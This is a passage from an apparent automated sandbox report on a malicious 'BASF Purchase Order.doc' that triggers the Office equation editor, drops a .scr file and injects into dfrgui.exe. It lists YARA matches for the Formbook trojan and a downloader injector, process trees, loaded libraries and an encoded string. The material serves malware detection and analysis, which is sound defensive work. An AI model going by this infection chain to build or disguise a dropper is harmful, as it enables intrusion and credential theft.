Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C5D47D	6_2_00C5D47D
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CC35DA	6_2_00CC35DA
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C2351F	6_2_00C2351F
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C557C3	6_2_00C557C3
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA579A	6_2_00CA579A
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CB771D	6_2_00CB771D
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C9F8C4	6_2_00C9F8C4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CBF8EE	6_2_00CBF8EE
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA394B	6_2_00CA394B
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CA5955	6_2_00CA5955
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CD3A83	6_2_00CD3A83
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CADBDA	6_2_00CADBDA
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1FBD7	6_2_00C1FBD7
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C47B00	6_2_00C47B00
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CBFDDD	6_2_00CBFDDD
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C4DF7C	6_2_00C4DF7C
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00CABF14	6_2_00CABF14
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61EACE75	8_2_61EACE75
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E15337	8_2_61E15337
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E5326F	8_2_61E5326F
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E216E1	8_2_61E216E1
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E186CE	8_2_61E186CE
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E4B62D	8_2_61E4B62D
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E55963	8_2_61E55963
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E95977	8_2_61E95977
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E10856	8_2_61E10856
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E1EDE4	8_2_61E1EDE4
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E1DDA7	8_2_61E1DDA7
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E52D0C	8_2_61E52D0C
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E8CCB3	8_2_61E8CCB3
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E4CC85	8_2_61E4CC85
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E4FFC8	8_2_61E4FFC8
Source: C:\Windows\SysWOW64\dfrgui.exe	Code function: 8_2_61E25E4C	8_2_61E25E4C

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: String function: 00C1E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: String function: 00C8F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: String function: 00C63F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: String function: 00C6373B appears 253 times
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: String function: 00C1DF5C appears 137 times

Source: sqlite3.dll.8.dr

Static PE information: Number of sections : 18 > 10

Source: C:\Windows\SysWOW64\dfrgui.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Jump to behavior

Source: BASF Purchase Order.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 6.2.sharon48399.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.sharon48399.scr.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.sharon48399.scr.a80000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.sharon48399.scr.328a370.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.sharon48399.scr.2267b24.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.sharon48399.scr.a80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.sharon48399.scr.226a364.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.sharon48399.scr.328a370.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.362337538.0000000000A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 5.2.sharon48399.scr.328a370.5.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.sharon48399.scr.a80000.1.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: sharon[1].scr.2.dr, --.cs	Task registration methods: 'CreateTaskItem'
Source: sharon48399.scr.2.dr, --.cs	Task registration methods: 'CreateTaskItem'
Source: 8.2.dfrgui.exe.28ccd08.2.raw.unpack, --.cs	Task registration methods: 'CreateTaskItem'

Source: 5.2.sharon48399.scr.328a370.5.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 5.2.sharon48399.scr.a80000.1.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@11/16@26/15

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$SF Purchase Order.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7389.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: dfrgui.exe, 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmp, sqlite3.dll.8.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: BASF Purchase Order.doc	Virustotal: Detection: 41%
Source: BASF Purchase Order.doc	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Windows\SysWOW64\dfrgui.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process created: C:\Users\user\AppData\Roaming\sharon48399.scr "C:\Users\user\AppData\Roaming\sharon48399.scr"	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: sxshared.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: apphelp.dll	Jump to behavior
